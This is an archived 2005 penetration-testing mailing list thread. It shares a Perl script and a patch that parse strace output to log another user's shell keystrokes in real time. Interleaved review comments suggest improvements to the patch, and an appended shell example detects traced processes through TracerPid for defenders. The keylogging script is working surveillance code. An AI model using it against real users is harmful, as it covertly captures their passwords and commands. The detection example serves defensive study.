Penetration Testing mailing list archives
Re: Keystroke logging with strace (no setup required)
From: Can't dig that daddy <cdtdaddy () hotmail it>
Date: Mon, 18 Jul 2005 12:28:28 +0000
A little patch I'm using to "follow" forking processes... Have a nice day, Can't dig that daddy. ---------snip----------------- 20c20 < open (F, "tail -f $ARGV[0] |"); ---
open (F, "strace -p $ARGV[0] 2>&1 |");
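Review bot: In the replacement open line, $ARGV[0] is now a PID but is still interpolated into a shell command string without any check, and the return value of open is not tested. Reject anything that does not match /^\d+$/ before this line and add "or die" to the open call, so a missing or malformed argument fails loudly instead of being handed to the shell. The usage comments at the top of the script still describe running it on a log file and should say the argument is now a PID.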
22c22 < next if !/^read/; ---
next if !/^read/ && !/^clone/;
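Review bot: The filter on line 22 now passes clone lines but no other call that creates a process, so a child that appears in the trace as fork(...) or vfork(...) would not be followed. If that matters, widen the pattern here and in the matching elsif branch added further down; a single positive test such as "next unless /^(?:read|clone)/;" would also read more clearly than the double negative.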
37a38,40
} elsif (/^clone\(.+,\s.+,\s.+\)\s=\s(\d+)/) { system("/usr/bin/perl -w $0 $1");
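Review bot: system(...) in the new elsif branch waits for the child tracer to exit, so the parent stops reading its own strace pipe for as long as the child process lives and nothing from the parent shell is displayed until then. Start the child tracer without waiting (fork, then exec($^X, "-w", $0, $1)) so that both run side by side and $0 is not re-parsed by the shell. The hunk header announces three added lines (38,40) but only two are visible here, so the closing part of the branch cannot be checked.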
---------snip-----------------
On Tuesday 12 July 2005 at 16:59, Lachniet, Mark wrote:
Apparently Tom's original message never made it to the list, but I think this is well worth the bandwidth to share. Tom wrote a quick Perl script to parse the output from strace, so you could use the method I described a little (lot) more conveniently. I haven't tested it but it looks pretty straightforward. Sorry bout the line breaks but I didn't want to send an attachment.

Mark Lachniet

---------snip-----------------
#!/usr/bin/perl -w
#
# Monitoring a user's shellcommands by using strace and displaying and cleaning up the read() syscalls
# Based on the tip posted to secfocus by Mark Lachniet, written by Tom Van de Wiele.
#
# To be used on a logfile or in real-time (as fast as /usr/bin/script logs to file that is) like this:
#
# # script /tmp/what_is_user_foo_doing.log
# Script started, file is /tmp/what_is_user_foo_doing.log
# # strace -p <PID of shell of user>
#
# Using a different terminal at the same time:
#
# # perl strace_clean.pl /tmp/what_is_user_doing.log
#
#

use strict;

# hi Kris :)

my $char;

open (F, "tail -f $ARGV[0] |");

while (<F>) {
    next if !/^read/;
    next if /^$/;
    if (/^read\(0,\s\"(.*)\".*/) {
        $char = $1;
        if ($char =~ /\\r/) {
            print "\n";
        } elsif ($char =~ /\\177/) {
            print "\b";
        } elsif ($char =~ /\\t/) {
            print "<TAB>";
        } else {
            print $char;
        }
    }
}

# EOF
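For defenders, an added example that is not part of the original posts or of Tom's script: while strace -p is attached to a shell as in the usage comments above, the kernel names the tracer in the TracerPid field of /proc/<pid>/status, so scanning that field lists every process being traced. The function names and the sample /proc-like tree are constructed for illustration.

```shell
#!/bin/sh
# Added example. Function names and the sample tree are constructed.

# list_traced [PROC_ROOT]: print "pid name tracer_pid tracer_name" for each
# process whose TracerPid field is non-zero, i.e. that has a ptrace tracer
# (strace -p, gdb -p, ...) attached right now.
list_traced() {
    root="${1:-/proc}"
    for status in "$root"/[0-9]*/status; do
        [ -r "$status" ] || continue          # exited meanwhile, or no match
        pid=${status%/status}
        pid=${pid##*/}
        tracer=$(awk '/^TracerPid:/ {print $2}' "$status" 2>/dev/null) || continue
        [ -n "$tracer" ] && [ "$tracer" != 0 ] || continue
        name=$(awk '/^Name:/ {print $2}' "$status" 2>/dev/null) || name=
        tname=$(awk '/^Name:/ {print $2}' "$root/$tracer/status" 2>/dev/null) || tname=
        printf '%s %s %s %s\n' "$pid" "${name:-?}" "$tracer" "${tname:-?}"
    done
}

# make_sample_proc: build a constructed /proc-like tree in a temp dir
# (a bash shell, pid 4242, traced by strace, pid 4300) and print its path.
make_sample_proc() {
    d=$(mktemp -d) || return 1
    for row in "4100 sshd 0" "4242 bash 4300" "4300 strace 0"; do
        set -- $row
        mkdir "$d/$1"
        printf 'Name:\t%s\nPid:\t%s\nTracerPid:\t%s\n' "$2" "$1" "$3" > "$d/$1/status"
    done
    echo "$d"
}

# Demo on the constructed tree; call list_traced with no argument for the live /proc.
sample=$(make_sample_proc)
list_traced "$sample"     # -> 4242 bash 4300 strace
rm -rf "$sample"
```

A non-zero TracerPid also appears during legitimate debugging, so a hit on an interactive shell is a lead to check against who owns the tracer. On kernels with the Yama LSM, kernel.yama.ptrace_scope restricts which processes may attach in the first place.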